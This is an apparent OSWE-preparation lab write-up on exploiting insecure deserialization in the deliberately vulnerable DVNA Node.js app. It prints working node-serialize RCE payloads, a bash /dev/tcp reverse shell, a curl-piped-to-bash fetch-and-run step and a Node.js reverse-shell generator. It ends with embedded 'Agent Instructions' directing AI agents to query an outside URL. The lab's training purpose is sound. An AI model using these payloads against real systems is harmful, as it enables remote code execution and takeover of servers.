# Node.js - Insecure Deserialization : DVNA ### Lab : * * Vulnerability name : `A8 - Insecure Deserialization` ### Deployment : docker option ### Networking : Vulnerable App IP: `172.17.0.2` Kali machine IP : `172.17.0.1` * Note: * I was using docker container, if you want to check container IP you can use the below command ```jsx docker inspect --format '{{ .NetworkSettings.IPAddress }}' container_name_or_id ``` ### Understanding Application Behaviour : The vulnerable function located at this url ```jsx http://127.0.0.1:9090/app/bulkproducts?legacy=true ``` we can see that the application is sharing with us the json data format as below ```jsx [{"name":"Xbox 360","code":"15","tags":"gaming console","description":"Microsoft's flagship gaming console"},{"name":"Playstation 3","code":"17","tags":"gaming console","description":"Sony's flagshipgaming console"}] ``` copying json data to a file & uploading that file to the application to see how the app is handling the request ![](/files/LJL7oQnyaHDXRLNRij19) the app is redirecting us to the product page, and if we follow the redirection we can see that the app is printing the json data that we uploaded ![](/files/wprhlnWPfsCJ20IDsXTE) ### Triggering the Vulnerability : I tried first to inject the following payload which just execute remote command "ls" to see if the application would print the output of the command in the table ```jsx {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls', function(error, stdout, stderr) { console.log(stdout) });}()"} ``` ![](/files/mhSXDYgWEQGtYvc4SxNP) but got an error message ![](/files/vV42OYwrkGym8pYtR4TG) However, it might be that the app executed our command successfully but it's not processing the output correctly, or we are in a blind injection situation, so I tried another method to check for blind Injection , one example can be using `ping` command, and ask the app to ping our host by forwarding this payload : ```jsx {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ping 172.17.0.1', function(error, stdout, stderr) { console.log(stdout) });}()"} ``` and capturing `icmp` packets on our host using this command ```jsx tcpdump -nni ethernet_interface icmp ``` and after we uploading the ping payload we can see that the app is successfully executed our command! ![](/files/FfwfcuDqWySdNhh773Rd) ### Reverse Shell - BASH TCP : hosting the following [shell.sh](http://shell.sh) using python `SimpleHTTPServer` ```bash bash -i >& /dev/tcp/172.17.0.1/4242 0>&1 ``` passing the following payload to the app ( the payload just curl the [shell.sh](http://shell.sh) file, to check that the application can fetch the file correctly ) ```bash {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('curl ', function(error, stdout, stderr) { console.log(stdout) });}()"} ``` and we can see that the app fetched our file ![](/files/RcRxdMT7aD3qDs7Q85lT) now passing this payload to first **fetch the file** (`curl`) & **execute it** (by piping it to `bash`) ```bash {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('curl | bash', function(error, stdout, stderr) { console.log(stdout) });}()"} ``` and we got the shell on our host! ![](/files/9WgnGuSh5RlXSoiHShua) ### Reverse Shell - Node.js : for a stable shell, we can rely on `JS` reverse shell, I've tried using the `nodejsshell.py` script () which generates the `JS` payload for us #### Running the script ```bash python nodejsshell.py 172.17.0.1 4242 ``` ![](/files/936iCgQ8Lwocq856rhex) now we can place the revers shell `JS` payload inside the `function body` of the serialized payload (as described in this article :) the final payload would be like this ```bash {"rce":"_$$ND_FUNC$$_function (){ .. place the JS payload here .. }()"} ``` and we got the shell ! ![](/files/MgZKjKqXZ9tXwFS4Q0sC) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://b1tbyte.gitbook.io/cheatsheets/oswe/oswe-preparation-machines/node.js-insecure-deserialization-dvna.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.